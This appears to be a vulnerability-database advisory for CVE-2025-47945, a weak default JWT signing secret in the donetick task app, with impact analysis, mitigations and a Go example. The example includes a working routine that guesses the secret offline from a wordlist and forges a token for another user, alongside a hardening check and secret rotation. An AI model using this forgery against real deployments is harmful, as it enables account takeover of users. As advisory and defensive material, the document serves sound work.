
CVE-2025-47945: CWE-453: Insecure Default Variable Initialization in donetick donetick

Critical
Tags: CVE-2025-47945, CWE-453, CWE-1188
Published: Sat May 17 2025 (05/17/2025, 18:36:11 UTC)
Source: CVE
Vendor/Project: donetick
Product: donetick

Description

Donetick is an open-source app for managing tasks and chores. Prior to version 0.1.44, the application uses JSON Web Tokens (JWT) for authentication, but the signing secret has a weak default value. While the responsibility is left to the system administrator to change it, this approach is inadequate. The vulnerability is proven by the existence of the issue in the live version as well. This issue can result in full account takeover of any user. Version 0.1.44 contains a patch.

AI-Powered Analysis

AI analysis last updated: 07/04/2025, 14:41:31 UTC

Technical Analysis

CVE-2025-47945 is a critical vulnerability in donetick, an open-source task and chore management application. The flaw is an insecure default: versions prior to 0.1.44 ship with a weak default secret for signing the JSON Web Tokens (JWT) the application uses for authentication. The secret is meant to be changed by the system administrator, but nothing forces that change, and the reporter confirmed the default in use on the live instance as well, so the weakness is exploitable in practice rather than only in theory. Because the token is signed with a shared secret, anyone holding that secret can produce signatures the server accepts. An attacker who knows or guesses the default can therefore mint a token for any user id entirely offline: no credentials, no user interaction, and no failed login attempts for the server to record. The forged token is indistinguishable from one the server issued, which is why the outcome is full account takeover with loss of confidentiality and integrity of user data. The issue is classified as CWE-453 (Insecure Default Variable Initialization) and CWE-1188 (Initialization of a Resource with an Insecure Default). Version 0.1.44 contains a patch. The CVSS v3.1 base score is 9.1 (critical): network attack vector, low attack complexity, no privileges or user interaction required, high confidentiality and integrity impact, no availability impact. No exploitation in the wild has been reported, but the confirmed presence of the default on a live instance means any self-hosted deployment that kept the shipped value should be treated as exposed.

Potential Impact

For European organizations running donetick versions prior to 0.1.44, this vulnerability allows complete takeover of any user account. That exposes task and chore data, which may include personal or business-critical information, and lets the attacker act as the user: read, alter or delete tasks, disrupt workflows, or use the foothold for further attacks within the environment. Because neither credentials nor user interaction are needed, exploitation can be fully automated against every user of an affected instance. The resulting breach of confidentiality and integrity may also constitute a personal data breach under GDPR, with notification obligations and potential legal and financial penalties. The CVSS vector records no availability impact, although an attacker holding any account can of course delete that user's tasks. The overall risk remains critical given how easy exploitation is and how broad the affected population is. Organizations relying on donetick for operational management should treat remediation as a high priority.

Mitigation Recommendations

1. Upgrade to donetick version 0.1.44 or later, which contains the patch for this issue.
2. Set the JWT signing secret to a strong, randomly generated value (at least 32 bytes from a cryptographic random source) on every deployment, whether or not the upgrade can be applied immediately, and confirm after upgrading that the running instance is not still using the shipped default. Rotating the secret invalidates every outstanding token and forces all users to log in again; that is the desired effect when the old secret may be known to an attacker.
3. Audit user accounts and access logs for signs of unauthorized access. A forged token leaves no failed login behind, so look for sessions with no preceding login, access from unexpected addresses or clients, and unexplained changes to tasks or account settings.
4. Monitor and alert on suspicious authentication activity related to token use, using the same indicators.
5. Enforce configuration management policies that block deployment of software still carrying default secrets or credentials.
6. Train system administrators to replace default secrets and credentials during installation and maintenance.
7. Use short token lifetimes and token revocation where the application supports them to narrow the window in which a stolen or forged token is useful. These do not substitute for rotating the secret: an attacker who knows the signing key can simply mint a fresh token.
8. Include JWT handling in penetration tests or vulnerability scans to find similar weaknesses, such as weak or default signing secrets and acceptance of unexpected signing algorithms.
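The forgery path described in the Technical Analysis and the secret checks recommended above, as an added Go example that is not donetick's code: it implements HS256 JWT signing and verification with the standard library, recovers a weak secret by testing a captured token against a short list of common defaults, mints a token for another user, and shows a startup check that rejects a placeholder or short secret together with a random replacement. The secret value "secret", the claim name "id", the candidate wordlist and the 32-byte length floor are constructed for this example and are not donetick's actual values.

```go
package main

import (
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
	"strings"
)

// Constructed placeholder for a weak shipped default; NOT donetick's actual value.
const weakDefaultSecret = "secret"
var b64 = base64.RawURLEncoding

// signHS256 builds a compact JWS (header.payload.signature) over the claims.
func signHS256(claims map[string]any, secret []byte) (string, error) {
	header, _ := json.Marshal(map[string]string{"alg": "HS256", "typ": "JWT"})
	payload, err := json.Marshal(claims)
	if err != nil {
		return "", err
	}
	input := b64.EncodeToString(header) + "." + b64.EncodeToString(payload)
	mac := hmac.New(sha256.New, secret)
	mac.Write([]byte(input))
	return input + "." + b64.EncodeToString(mac.Sum(nil)), nil
}

// verifyHS256 recomputes the MAC over header.payload, compares in constant time, and returns the claims.
func verifyHS256(token string, secret []byte) (map[string]any, error) {
	parts := strings.Split(token, ".")
	if len(parts) != 3 {
		return nil, errors.New("malformed token")
	}
	sig, err := b64.DecodeString(parts[2])
	if err != nil {
		return nil, err
	}
	mac := hmac.New(sha256.New, secret)
	mac.Write([]byte(parts[0] + "." + parts[1]))
	if !hmac.Equal(sig, mac.Sum(nil)) {
		return nil, errors.New("invalid signature")
	}
	raw, err := b64.DecodeString(parts[1])
	if err != nil {
		return nil, err
	}
	var claims map[string]any
	err = json.Unmarshal(raw, &claims)
	return claims, err
}

// crackSecret is the attacker side: test a captured token against common defaults, offline, so the target logs nothing.
func crackSecret(token string, candidates []string) (string, bool) {
	for _, c := range candidates {
		if _, err := verifyHS256(token, []byte(c)); err == nil {
			return c, true
		}
	}
	return "", false
}

// validateSecret is the startup check a hardened deployment should make: refuse the shipped
// placeholder and anything under 32 bytes (a floor, not an entropy measure; use a CSPRNG).
func validateSecret(secret string) error {
	if secret == weakDefaultSecret {
		return errors.New("jwt secret is the shipped default; set a unique value")
	}
	if len(secret) < 32 {
		return errors.New("jwt secret shorter than 32 bytes")
	}
	return nil
}

// newRandomSecret returns 32 CSPRNG bytes, base64url-encoded, for a config file.
func newRandomSecret() (string, error) {
	buf := make([]byte, 32)
	if _, err := rand.Read(buf); err != nil {
		return "", err
	}
	return b64.EncodeToString(buf), nil
}

func main() {
	// Vulnerable instance: the administrator never changed the default.
	victim, _ := signHS256(map[string]any{"id": 1}, []byte(weakDefaultSecret))
	guess, ok := crackSecret(victim, []string{"changeme", "password", "secret"})
	fmt.Println("secret recovered:", ok, guess)
	forged, _ := signHS256(map[string]any{"id": 2}, []byte(guess)) // any user id; claim name assumed
	claims, err := verifyHS256(forged, []byte(weakDefaultSecret))
	fmt.Println("server accepts forged token:", err == nil, claims)
	// Hardened instance: reject the default, rotate to a random secret; the forged token (and every previously issued one) stops verifying.
	fmt.Println("startup check on default:", validateSecret(weakDefaultSecret))
	strong, _ := newRandomSecret()
	fmt.Println("startup check on random secret:", validateSecret(strong))
	_, err = verifyHS256(forged, []byte(strong))
	fmt.Println("forged token after rotation:", err)
}
```

The cracking loop is the reason a short default is fatal for an HMAC-signed token: verification needs no interaction with the server, so a single captured token lets the attacker test candidate secrets at full speed and then sign for any user id. The rotation at the end also shows why mitigation 2 forces re-login: every token signed under the old secret, forged or legitimate, fails verification under the new one.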


Technical Details

Data Version: 5.1
Assigner Short Name: GitHub_M
Date Reserved: 2025-05-14T10:32:43.530Z
CISA Enriched: true
CVSS Version: 3.1
State: PUBLISHED

Threat ID: 682cd0f81484d88663aeb720

Added to database: 5/20/2025, 6:59:04 PM

Last enriched: 7/4/2025, 2:41:31 PM

Last updated: 8/1/2025, 2:22:23 AM

